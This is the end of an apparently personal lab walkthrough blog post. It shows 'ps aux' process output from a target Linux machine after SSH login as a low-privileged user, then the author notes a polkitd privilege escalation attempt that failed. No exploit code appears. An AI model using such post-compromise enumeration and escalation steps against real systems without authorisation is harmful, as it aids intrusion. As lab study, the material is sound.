root         576  0.0  0.3 395576 14260 ?        Ssl  07:30   0:00 /usr/lib/udisks2/udisksd
root         577  0.0  0.1  13672  4844 ?        Ss   07:30   0:00 /sbin/wpa_supplicant -u -s -O 
avahi        585  0.0  0.0   8328   332 ?        S    07:30   0:00 avahi-daemon: chroot helper
root         649  0.0  0.2  31296  8776 ?        Ss   07:30   0:00 /usr/sbin/cupsd -l
root         665  0.0  0.3 180432 12700 ?        Ssl  07:30   0:00 /usr/sbin/cups-browsed
root         668  0.0  0.2 240004 10376 ?        Ssl  07:30   0:00 /usr/sbin/ModemManager --filte
root         677  0.0  0.5 120548 23008 ?        Ssl  07:30   0:00 /usr/bin/python3 /usr/share/un
root         679  0.0  0.0   6816  2988 ?        Ss   07:30   0:00 /usr/sbin/vsftpd /etc/vsftpd.c
root         716  0.0  0.2 242204  8836 ?        Ssl  07:30   0:00 /usr/sbin/gdm3
root         718  0.0  0.1  12168  7288 ?        Ss   07:30   0:00 sshd: /usr/sbin/sshd -D [liste
root         740  0.0  0.2 169384  9288 ?        Sl   07:30   0:00 gdm-session-worker [pam/gdm-la
whoopsie     777  0.0  0.3 178068 13808 ?        Ssl  07:30   0:00 /usr/bin/whoopsie -f
kernoops     781  0.0  0.0  11248   448 ?        Ss   07:30   0:00 /usr/sbin/kerneloops --test
kernoops     783  0.0  0.0  11248   444 ?        Ss   07:30   0:00 /usr/sbin/kerneloops
root         837  0.0  0.4 194040 18364 ?        Ss   07:30   0:00 /usr/sbin/apache2 -k start
gdm          839  0.0  0.2  19164 10308 ?        Ss   07:30   0:00 /lib/systemd/systemd --user
gdm          840  0.0  0.0 103328  3448 ?        S    07:30   0:00 (sd-pam)
www-data     844  0.0  0.3 194528 13228 ?        S    07:30   0:02 /usr/sbin/apache2 -k start
gdm          872  0.0  0.3 1069608 14624 ?       S<sl 07:30   0:00 /usr/bin/pulseaudio --daemoniz
gdm          874  0.0  0.6 514024 24440 ?        SNsl 07:30   0:00 /usr/libexec/tracker-miner-fs
gdm          875  0.0  0.1 164384  5964 tty1     Ssl+ 07:30   0:00 /usr/lib/gdm3/gdm-wayland-sess
gdm          877  0.0  0.1   7808  5060 ?        Ss   07:30   0:00 /usr/bin/dbus-daemon --session
mysql        878  0.0  9.3 1287372 378540 ?      Ssl  07:30   0:11 /usr/sbin/mysqld
gdm          884  0.0  0.3 267344 15616 tty1     Sl+  07:30   0:00 /usr/libexec/gnome-session-bin
gdm          885  0.0  0.1 242436  7944 ?        Ssl  07:30   0:00 /usr/libexec/gvfsd
rtkit        886  0.0  0.0 152924  3020 ?        SNsl 07:30   0:00 /usr/libexec/rtkit-daemon
gdm          911  0.0  0.2 316528  8220 ?        Sl   07:30   0:00 /usr/libexec/gvfsd-fuse /run/u
gdm          916  0.0  0.2 320120 11764 ?        Ssl  07:30   0:00 /usr/libexec/gvfs-udisks2-volu
gdm          926  0.0  0.1 240712  6956 ?        Ssl  07:30   0:00 /usr/libexec/gvfs-gphoto2-volu
gdm          931  0.0  0.1 238440  6600 ?        Ssl  07:30   0:00 /usr/libexec/gvfs-mtp-volume-m
gdm          944  0.0  0.1 238612  6296 ?        Ssl  07:30   0:00 /usr/libexec/gvfs-goa-volume-m
gdm          963  0.0  0.8 544328 36040 ?        Sl   07:30   0:00 /usr/libexec/goa-daemon
gdm          974  0.0  0.1  92784  4316 ?        Ssl  07:30   0:00 /usr/libexec/gnome-session-ctl
gdm          980  0.0  0.1 242764  5956 ?        Sl   07:30   0:00 /usr/bin/gnome-keyring-daemon 
gdm          989  0.0  0.4 488944 16932 ?        Ssl  07:30   0:00 /usr/libexec/gnome-session-bin
gdm         1001  0.0  4.5 3555992 184896 ?      Ssl  07:30   0:03 /usr/bin/gnome-shell
gdm         1008  0.0  0.2 321276 11488 ?        Sl   07:30   0:00 /usr/libexec/goa-identity-serv
gdm         1010  0.0  0.2 319464  9044 ?        Ssl  07:30   0:00 /usr/libexec/gvfs-afc-volume-m
root        1019  0.0  0.2 254856  9732 ?        Ssl  07:30   0:00 /usr/lib/upower/upowerd
gdm         1063  0.0  0.2 309508  8224 ?        Ssl  07:30   0:00 /usr/libexec/at-spi-bus-launch
gdm         1068  0.0  0.1   7224  4244 ?        S    07:30   0:00 /usr/bin/dbus-daemon --config-
gdm         1071  0.0  0.9 120792 40072 ?        S    07:30   0:00 /usr/bin/Xwayland :1024 -rootl
gdm         1090  0.0  0.1 156100  5444 ?        Sl   07:30   0:00 /usr/libexec/dconf-service
gdm         1093  0.0  0.1 238332  4608 ?        Ssl  07:30   0:00 /usr/libexec/xdg-permission-st
gdm         1104  0.0  0.6 2601240 26456 ?       Sl   07:30   0:00 /usr/bin/gjs /usr/share/gnome-
gdm         1106  0.0  0.1 162756  6744 ?        Sl   07:30   0:00 /usr/libexec/at-spi2-registryd
gdm         1116  0.0  0.2 316488  9236 ?        Ssl  07:30   0:00 /usr/libexec/gsd-a11y-settings
gdm         1117  0.0  0.6 346160 25352 ?        Ssl  07:30   0:00 /usr/libexec/gsd-color
gdm         1118  0.0  0.6 345148 24640 ?        Ssl  07:30   0:00 /usr/libexec/gsd-keyboard
gdm         1119  0.0  0.6 613648 26920 ?        Ssl  07:30   0:00 /usr/libexec/gsd-media-keys
gdm         1120  0.0  0.6 345844 25532 ?        Ssl  07:30   0:00 /usr/libexec/gsd-power
gdm         1121  0.0  0.2 250948 11492 ?        Ssl  07:30   0:00 /usr/libexec/gsd-print-notific
gdm         1123  0.0  0.1 459836  6208 ?        Ssl  07:30   0:00 /usr/libexec/gsd-rfkill
gdm         1128  0.0  0.2 320520 10520 ?        Ssl  07:30   0:00 /usr/libexec/gsd-smartcard
gdm         1129  0.0  0.2 324244 11052 ?        Ssl  07:30   0:00 /usr/libexec/gsd-sound
gdm         1130  0.0  0.2 464184  9404 ?        Ssl  07:30   0:00 /usr/libexec/gsd-usb-protectio
gdm         1131  0.0  0.6 344936 24396 ?        Ssl  07:30   0:00 /usr/libexec/gsd-wacom
gdm         1132  0.0  0.2 320808 10656 ?        Ssl  07:30   0:00 /usr/libexec/gsd-wwan
gdm         1181  0.0  0.3 344900 15368 ?        Sl   07:30   0:00 /usr/libexec/gsd-printer
gdm         1214  0.0  0.2 464732 10484 ?        Sl   07:30   0:00 ibus-daemon --panel disable -r
gdm         1216  0.0  1.4 449204 59640 ?        Ssl  07:30   0:00 /usr/libexec/gsd-xsettings
gdm         1226  0.0  0.2 242844  8728 ?        Sl   07:30   0:00 /usr/libexec/ibus-dconf
gdm         1230  0.0  0.7 202880 29752 ?        Sl   07:30   0:00 /usr/libexec/ibus-x11 --kill-d
colord      1232  0.0  0.4 251672 16756 ?        Ssl  07:30   0:00 /usr/libexec/colord
gdm         1236  0.0  0.2 242824  8760 ?        Sl   07:30   0:00 /usr/libexec/ibus-portal
gdm         1259  0.0  0.2 169148  8748 ?        Sl   07:30   0:00 /usr/libexec/ibus-engine-simpl
root        2310  0.0  0.0      0     0 ?        I    11:21   0:00 [kworker/u2:0-events_power_eff
root        2392  0.0  0.0      0     0 ?        I    11:28   0:00 [kworker/u2:2-events_unbound]
root        2494  0.0  0.0      0     0 ?        I    11:57   0:00 [kworker/0:0-events]
www-data    2597  0.1  0.3 194520 13128 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2624  0.0  0.3 194520 13148 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2649  0.0  0.3 194520 13148 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2667  0.0  0.3 194520 13128 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2669  0.0  0.3 194528 13256 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2670  0.0  0.3 194520 13148 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2674  0.0  0.3 194520 13188 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2678  0.0  0.3 194528 13796 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
www-data    2681  0.0  0.3 194520 13148 ?        S    12:19   0:00 /usr/sbin/apache2 -k start
root        2695  0.0  0.2  13988  9048 ?        Ss   12:26   0:00 sshd: thugger [priv]
thugger     2698  0.0  0.2  18788 10056 ?        Ss   12:26   0:00 /lib/systemd/systemd --user
thugger     2699  0.0  0.0 103568  3588 ?        S    12:26   0:00 (sd-pam)
thugger     2717  0.0  0.3 283092 14468 ?        Ssl  12:26   0:00 /usr/bin/pulseaudio --daemoniz
thugger     2719  0.0  0.6 661456 24424 ?        SNsl 12:26   0:00 /usr/libexec/tracker-miner-fs
thugger     2726  0.0  0.1   7360  4412 ?        Ss   12:26   0:00 /usr/bin/dbus-daemon --session
thugger     2733  0.0  0.1 242436  7780 ?        Ssl  12:26   0:00 /usr/libexec/gvfsd
thugger     2738  0.0  0.2 382064  8468 ?        Sl   12:26   0:00 /usr/libexec/gvfsd-fuse /run/u
thugger     2760  0.0  0.2 320128 11628 ?        Ssl  12:26   0:00 /usr/libexec/gvfs-udisks2-volu
thugger     2767  0.0  0.1 240712  6860 ?        Ssl  12:26   0:00 /usr/libexec/gvfs-gphoto2-volu
thugger     2771  0.0  0.1 238440  6536 ?        Ssl  12:26   0:00 /usr/libexec/gvfs-mtp-volume-m
thugger     2775  0.0  0.1 238612  6360 ?        Ssl  12:26   0:00 /usr/libexec/gvfs-goa-volume-m
thugger     2779  0.0  0.9 544456 36340 ?        Sl   12:26   0:00 /usr/libexec/goa-daemon
thugger     2802  0.0  0.2 395144 11812 ?        Sl   12:26   0:00 /usr/libexec/goa-identity-serv
thugger     2806  0.0  0.2 319464  8992 ?        Ssl  12:26   0:00 /usr/libexec/gvfs-afc-volume-m
thugger     2832  0.0  0.1 164988  6564 ?        Ssl  12:26   0:00 /usr/libexec/gvfsd-metadata
thugger     2870  0.0  0.1  13988  5880 ?        S    12:26   0:00 sshd: thugger@pts/0
thugger     2880  0.0  0.1  13344  5268 pts/0    Ss   12:26   0:00 -bash
root        2896  0.0  0.0      0     0 ?        I    12:26   0:00 [kworker/u2:1-events_power_eff
thugger     3496  0.0  0.0  14220  3516 pts/0    R+   12:33   0:00 ps aux

polkitd is running, and it has a known privilege escalation vulnerability.

The exploit failed to run, possibly because I set the target host's network to host-only and this exploit needs network access.


posted @ 2022-11-18 23:04 Jason_huawen